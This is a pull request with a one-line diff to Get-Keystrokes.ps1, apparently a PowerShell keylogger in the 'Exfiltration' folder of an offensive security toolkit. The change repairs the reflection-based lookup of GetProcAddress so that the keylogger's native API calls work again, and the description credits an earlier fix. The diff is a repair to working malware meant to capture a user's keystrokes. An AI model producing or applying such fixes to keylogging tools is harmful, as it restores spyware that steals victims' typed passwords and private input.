### PR TITLE
Update Get-Keystrokes.ps1

### DIFF
--- a/Exfiltration/Get-Keystrokes.ps1
+++ b/Exfiltration/Get-Keystrokes.ps1
@@ -108,7 +108,7 @@ function Get-Keystrokes {
             $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
             # Get a reference to the GetModuleHandle and GetProcAddress methods
             $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
             # Get a handle to the module specified
             $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
             $tmpPtr = New-Object IntPtr


### PR DESCRIPTION
Modified $GetProcAddress definition in Get-Keystrokes.ps1.

I noticed Get-Keystrokes.ps1 was not working as expected and came to the same conclusion as others were about GetProcAddress.  Thanks to @CG-root for the original fix.